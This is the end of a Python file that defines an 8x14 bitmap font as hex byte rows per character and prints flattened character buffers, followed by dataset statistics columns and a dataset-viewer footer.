'@':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xDE,0xDE,0xDE,0xC0,0x7C,0x00,0x00,0x00],
'A':[0x00,0x00,0x10,0x38,0x6C,0xC6,0xC6,0xFE,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'B':[0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xFC,0xC6,0xC6,0xC6,0xFC,0x00,0x00,0x00],
'C':[0x00,0x00,0x3C,0x66,0xC0,0xC0,0xC0,0xC0,0xC0,0x66,0x3C,0x00,0x00,0x00],
'D':[0x00,0x00,0xF8,0xCC,0xC6,0xC6,0xC6,0xC6,0xC6,0xCC,0xF8,0x00,0x00,0x00],
'E':[0x00,0x00,0xFE,0xC0,0xC0,0xC0,0xFC,0xC0,0xC0,0xC0,0xFE,0x00,0x00,0x00],
'F':[0x00,0x00,0xFE,0xC0,0xC0,0xC0,0xFC,0xC0,0xC0,0xC0,0xC0,0x00,0x00,0x00],
'G':[0x00,0x00,0x3C,0x66,0xC0,0xC0,0xC0,0xCE,0xC6,0x66,0x3C,0x00,0x00,0x00],
'H':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xFE,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'I':[0x00,0x00,0x3C,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x3C,0x00,0x00,0x00],
'J':[0x00,0x00,0x1E,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x78,0x00,0x00,0x00],
'K':[0x00,0x00,0xC6,0xCC,0xD8,0xF0,0xE0,0xF0,0xD8,0xCC,0xC6,0x00,0x00,0x00],
'L':[0x00,0x00,0xC0,0xC0,0xC0,0xC0,0xC0,0xC0,0xC0,0xC0,0xFE,0x00,0x00,0x00],
'M':[0x00,0x00,0xC6,0xEE,0xFE,0xFE,0xD6,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'N':[0x00,0x00,0xC6,0xE6,0xF6,0xFE,0xDE,0xCE,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'O':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'P':[0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xFC,0xC0,0xC0,0xC0,0xC0,0x00,0x00,0x00],
'Q':[0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xC6,0xC6,0xD6,0xCC,0x7A,0x00,0x00,0x00],
'R':[0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xFC,0xD8,0xCC,0xC6,0xC6,0x00,0x00,0x00],
'S':[0x00,0x00,0x7C,0xC6,0xC0,0x60,0x38,0x0C,0x06,0xC6,0x7C,0x00,0x00,0x00],
'T':[0x00,0x00,0x7E,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'U':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'V':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0xC6,0x6C,0x38,0x10,0x00,0x00,0x00],
'W':[0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xD6,0xD6,0xFE,0xEE,0xC6,0x00,0x00,0x00],
'X':[0x00,0x00,0xC6,0xC6,0x6C,0x38,0x10,0x38,0x6C,0xC6,0xC6,0x00,0x00,0x00],
'Y':[0x00,0x00,0x66,0x66,0x66,0x66,0x3C,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'Z':[0x00,0x00,0xFE,0x06,0x0C,0x18,0x30,0x60,0xC0,0xC0,0xFE,0x00,0x00,0x00],
'[':[0x00,0x00,0x3C,0x30,0x30,0x30,0x30,0x30,0x30,0x30,0x3C,0x00,0x00,0x00],
'\\':[0x00,0x00,0x00,0x80,0xC0,0x60,0x30,0x18,0x0C,0x06,0x02,0x00,0x00,0x00],
']':[0x00,0x00,0x3C,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x0C,0x3C,0x00,0x00,0x00],
'^':[0x10,0x38,0x6C,0xC6,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'_':[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFE,0x00],
'`':[0x30,0x30,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],
'a':[0x00,0x00,0x00,0x00,0x00,0x7C,0x06,0x7E,0xC6,0xC6,0x7E,0x00,0x00,0x00],
'b':[0x00,0x00,0xC0,0xC0,0xC0,0xFC,0xC6,0xC6,0xC6,0xC6,0xFC,0x00,0x00,0x00],
'c':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC6,0xC0,0xC0,0xC6,0x7C,0x00,0x00,0x00],
'd':[0x00,0x00,0x06,0x06,0x06,0x7E,0xC6,0xC6,0xC6,0xC6,0x7E,0x00,0x00,0x00],
'e':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC6,0xFE,0xC0,0xC6,0x7C,0x00,0x00,0x00],
'f':[0x00,0x00,0x3C,0x66,0x60,0x60,0xF0,0x60,0x60,0x60,0x60,0x00,0x00,0x00],
'g':[0x00,0x00,0x00,0x00,0x00,0x7E,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x06,0x7C],
'h':[0x00,0x00,0xC0,0xC0,0xC0,0xFC,0xC6,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'i':[0x00,0x00,0x18,0x18,0x00,0x00,0x18,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'j':[0x00,0x00,0x06,0x06,0x00,0x00,0x06,0x06,0x06,0x06,0x06,0x06,0xC6,0x7C],
'k':[0x00,0x00,0xC0,0xC0,0xC0,0xCC,0xD8,0xF0,0xD8,0xCC,0xC6,0x00,0x00,0x00],
'l':[0x00,0x00,0x38,0x18,0x18,0x18,0x18,0x18,0x18,0x18,0x3C,0x00,0x00,0x00],
'm':[0x00,0x00,0x00,0x00,0x00,0xEC,0xD6,0xD6,0xD6,0xD6,0xC6,0x00,0x00,0x00],
'n':[0x00,0x00,0x00,0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xC6,0xC6,0x00,0x00,0x00],
'o':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'p':[0x00,0x00,0x00,0x00,0x00,0xFC,0xC6,0xC6,0xC6,0xC6,0xFC,0xC0,0xC0,0xC0],
'q':[0x00,0x00,0x00,0x00,0x00,0x7E,0xC6,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x06],
'r':[0x00,0x00,0x00,0x00,0x00,0xFC,0xC6,0xC0,0xC0,0xC0,0XC0,0x00,0x00,0x00],
's':[0x00,0x00,0x00,0x00,0x00,0x7C,0xC0,0x70,0x1C,0x06,0x7C,0x00,0x00,0x00],
't':[0x00,0x00,0x30,0x30,0xFC,0x30,0x30,0x30,0x30,0x30,0x1C,0x00,0x00,0x00],
'u':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0x7C,0x00,0x00,0x00],
'v':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xC6,0x6C,0x38,0x10,0x00,0x00,0x00],
'w':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xD6,0xD6,0xFE,0xC6,0x00,0x00,0x00],
'x':[0x00,0x00,0x00,0x00,0x00,0xC6,0x6C,0x38,0x38,0x6C,0xC6,0x00,0x00,0x00],
'y':[0x00,0x00,0x00,0x00,0x00,0xC6,0xC6,0xC6,0xC6,0xC6,0x7E,0x06,0x06,0x7C],
'z':[0x00,0x00,0x00,0x00,0x00,0xFE,0x0C,0x18,0x30,0x60,0xFE,0x00,0x00,0x00],
'{':[0x00,0x00,0x0E,0x18,0x18,0x18,0x60,0x18,0x18,0x18,0x0E,0x00,0x00,0x00],
'|':[0x00,0x00,0x18,0x18,0x18,0X18,0x00,0x18,0x18,0x18,0x18,0x00,0x00,0x00],
'}':[0x00,0x00,0x70,0x18,0x18,0X18,0x06,0x18,0x18,0x18,0x70,0x00,0x00,0x00],
'~':[0x76,0xDC,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]
}
def makecharbuf(
chardict: dict) -> list:
charlen = len(chardict['0'])
b = [charlen]
blankchar = [0 for _ in range(charlen)]
for i in range(256):
c = chardict.get(chr(i), blankchar)
b += c
return b
def main():
print(notice)
print(makecharbuf(
get8x8charpatterns()))
print(makecharbuf(
get8x14charpatterns()))
if __name__ == "__main__":
main()
| 60.33617
| 89
| 0.636646
| 2,327
| 14,179
| 3.874517
| 0.067469
| 0.454303
| 0.423248
| 0.354925
| 0.695763
| 0.59106
| 0.472826
| 0.30823
| 0.266526
| 0.225488
| 0
| 0.429264
| 0.127089
| 14,179
| 234
| 90
| 60.594017
| 0.299184
| 0.007546
| 0
| 0.026549
| 0
| 0
| 0.048831
| 0.013931
| 0
| 1
| 0.587959
| 0
| 0
| 1
| 0.017699
| false
| 0
| 0
| 0.00885
| 0.030973
| 0.013274
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.